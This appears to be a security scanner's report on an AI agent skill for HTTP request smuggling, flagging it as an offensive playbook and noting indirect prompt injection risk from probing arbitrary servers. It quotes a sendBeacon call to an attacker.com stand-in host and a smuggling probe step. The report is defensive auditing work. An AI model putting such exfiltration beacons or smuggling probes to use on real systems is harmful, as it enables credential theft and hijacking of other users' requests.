request-smuggling

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This is a clearly offensive request-smuggling playbook: it contains explicit techniques and PoCs for hijacking other users' requests, cache poisoning, and client-side desync that enable credential theft and data exfiltration (e.g., fetch with credentials: 'include' and navigator.sendBeacon('https://attacker.com/log', ...)), plus header-obfuscation variants to evade defenses—indicating deliberate malicious use rather than mere benign testing guidance.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The SKILL.md and H2_SMUGGLING_VARIANTS.md explicitly instruct the agent to send probes to arbitrary target servers and read/interpret their HTTP responses (e.g., "Send H2 POST with content-length: 0 and smuggled prefix" and the detection steps), which means the agent will fetch and act on untrusted third‑party web content as part of its workflow.